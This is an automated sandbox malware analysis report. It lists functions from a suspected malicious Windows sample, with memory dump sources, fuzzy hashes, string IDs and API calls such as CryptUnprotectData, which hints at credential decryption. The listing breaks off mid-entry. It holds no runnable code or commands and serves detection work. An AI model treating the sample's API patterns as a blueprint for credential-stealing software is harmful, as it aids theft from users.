                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: d80559edaf679485c08100300eb70c3058218f0bd7de0ebb1224d449397279f9
                                • Instruction ID: 2af6633b92f789dc6a1483962024904adfdf0cc5db31e566c9af8401f29076ca
                                • Opcode Fuzzy Hash: d80559edaf679485c08100300eb70c3058218f0bd7de0ebb1224d449397279f9
                                • Instruction Fuzzy Hash: 42118EB194521CEFEB208B54DD4AFA9BB78FB04725F10439AE90A932C0C7746A44CFA1
                                Function 011558B2 Relevance: 5.4, Strings: 3, Instructions: 1635COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3|u<$k~s$z
                                • API String ID: 0-935043890
                                • Opcode ID: 5bd068bd3b91c6f6aac5ca66abfe40ea1f9386f947c32e019fdf8dc32ea93273
                                • Instruction ID: d9b3838cfb3ac40fa35f9be4d44db6c96db3478bddf7256ff94a32afb792c3aa
                                • Opcode Fuzzy Hash: 5bd068bd3b91c6f6aac5ca66abfe40ea1f9386f947c32e019fdf8dc32ea93273
                                • Instruction Fuzzy Hash: 9DB24AF360C2009FE304AE2DEC8567ABBE9EF94360F1A853DE6C4C7744E63599058697
                                Function 0113EAB9 Relevance: 4.9, Strings: 3, Instructions: 1158COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: jQQk$~>{$|nW
                                • API String ID: 0-3171528340
                                • Opcode ID: 59aac489a0b8e4cdce8caab03d3add18bf0716312478a06ba45a62584b34fed5
                                • Instruction ID: 99540ec53c632ee50bb5f8df3014aa2013eee583361b73594cc0a360d4dd2cda
                                • Opcode Fuzzy Hash: 59aac489a0b8e4cdce8caab03d3add18bf0716312478a06ba45a62584b34fed5
                                • Instruction Fuzzy Hash: 437219F360C2049FE3046E2DEC8567ABBE9EBD4720F1A453DEAC5C3744EA3598058697
                                Function 00D93720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00D9E118,00000000,00000001,00D9E108,00000000), ref: 00D93758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D937B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 6667240708ffc8fa0c8eeeb4a9a3ac80d7a1c022f149fa3125a0fe4f7614953b
                                • Instruction ID: 591afe27dea127bd6a25728e5f26b00b9492eae9b270da9a30a9e1531764fb6e
                                • Opcode Fuzzy Hash: 6667240708ffc8fa0c8eeeb4a9a3ac80d7a1c022f149fa3125a0fe4f7614953b
                                • Instruction Fuzzy Hash: 8341D670A40A28AFDB24DB58CC95B9BB7B5BB48702F5041D8A608E72D0D771AE85CF60
                                Function 00D89B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D89B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D89BA3
                                • LocalFree.KERNEL32(?), ref: 00D89BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: dea3ec63e43c39464f460a8a21dda7c8158cf9026ecc3eb42d3c1fd89a9fcf84
                                • Instruction ID: 91491131d1d549ab08d82d3f09eeaf25398cbaed82b9240b87927057a7f237ad
                                • Opcode Fuzzy Hash: dea3ec63e43c39464f460a8a21dda7c8158cf9026ecc3eb42d3c1fd89a9fcf84
                                • Instruction Fuzzy Hash: C711A5B8A00209EFDB04DF94D985EAEB7B5FF88304F144598E915A7390D774AE11CBA1
                                Function 0114C638 Relevance: 3.1, Strings: 2, Instructions: 554COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Bt_$m5
                                • API String ID: 0-2187979626
                                • Opcode ID: 4753ac9454adad583c937fa39ae33a7d52392934da18fd3c4234fbd91ff1c6e7
                                • Instruction ID: b121421828170cb4dc00e4952ee9151947eb8d9a4db3d24d55b0cdf8d0c8fa62
                                • Opcode Fuzzy Hash: 4753ac9454adad583c937fa39ae33a7d52392934da18fd3c4234fbd91ff1c6e7
                                • Instruction Fuzzy Hash: 7102D6F3A0C2149FE314AF2DDC8567AF7E9EB98720F16452DEAC8C3340EA3558158796
                                Function 0106297C Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: RV-v${]
                                • API String ID: 0-222116142
                                • Opcode ID: 40bec07204ed0f2601c53aac7e3b93c9823ff5f14c9702f9e00f2c656e090383
                                • Instruction ID: c2aba1b7fbf15d6ecc53d57f53196131bf4c15f7aa77e48cc51dfdaf6deef8c2
                                • Opcode Fuzzy Hash: 40bec07204ed0f2601c53aac7e3b93c9823ff5f14c9702f9e00f2c656e090383
                                • Instruction Fuzzy Hash: 97511CF3F086049BF304AE29DC5576AB7D6DBD4720F2B853DDAC8C3384E93958068296
                                Function 01091DA5 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 83]2
                                • API String ID: 0-4113835522
                                • Opcode ID: 2019a1c64980819b48871a0eb683f931745225d819f8e18b37c667ea7c65d097
                                • Instruction ID: cfae716114fbfc1f4f0ef2e4ba32097bf7b520599c4fed2d58aedfebacb73a16
                                • Opcode Fuzzy Hash: 2019a1c64980819b48871a0eb683f931745225d819f8e18b37c667ea7c65d097
                                • Instruction Fuzzy Hash: D841B6F3A086006BF3049E2EDD8477AB7DADBD4320F2AC63DE188D3744E574D8068651
                                Function 011044C5 Relevance: .2, Instructions: 203COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e91525faf1620c1c6d91c920139cc73e226c163452d2049fcd618870b796daca
                                • Instruction ID: 53c95dcc19b2c268db287f0ad49226aa0ad0761be2174128ca566be5ccf9b9bf
                                • Opcode Fuzzy Hash: e91525faf1620c1c6d91c920139cc73e226c163452d2049fcd618870b796daca
                                • Instruction Fuzzy Hash: 8E5105F3A087009FF308AE2EDC9572AB7D6EBD4310F16453DDA88C7780E93965158686
                                Function 01197C3F Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04f57d054c60eb359902c4a8c0a5fae3502dde10237a499c61aad7c90c34661d
                                • Instruction ID: 5f08f9b925cb4aaf0e9180e2979db332663649d6fca5c4ac7e85ae9e4efb472a
                                • Opcode Fuzzy Hash: 04f57d054c60eb359902c4a8c0a5fae3502dde10237a499c61aad7c90c34661d
                                • Instruction Fuzzy Hash: 7951E5B362C604CFEB0D7E28ED453BEB7E6AF80210F13493DD6E246684E73158048A87
                                Function 010B5702 Relevance: .2, Instructions: 181COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9f3e1ae1f4287cb5156cdd9072218351ae2124bafc157718657320df66070a78
                                • Instruction ID: 3e2352b19bcc95ba7ef6e4fee9faf2edf195f3004a9f2c8e8c01fd6b28f214ec
                                • Opcode Fuzzy Hash: 9f3e1ae1f4287cb5156cdd9072218351ae2124bafc157718657320df66070a78
                                • Instruction Fuzzy Hash: 4D5127B36082049FF3449D79DD8977BB7D6EB84320F2A863DEA85C7B84E97A5C054242
                                Function 010864D0 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09342738a6b72b90114cd37485d7b3c6655952a380f26ecce927c25b22e0c024
                                • Instruction ID: db1e8575006c3706103e0881260b5c94104b7eedd36e8ad2549d2728477565fb
                                • Opcode Fuzzy Hash: 09342738a6b72b90114cd37485d7b3c6655952a380f26ecce927c25b22e0c024
                                • Instruction Fuzzy Hash: B15115F3A182045BF7486E3CDC5477AB6D6EBD4310F2B463DEA85D3784E5399C058286
                                Function 00FEEE1B Relevance: .2, Instructions: 165COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2704ee246815c80507d76694ccd4031a1b20f9c3d8642067025737d814a4811a
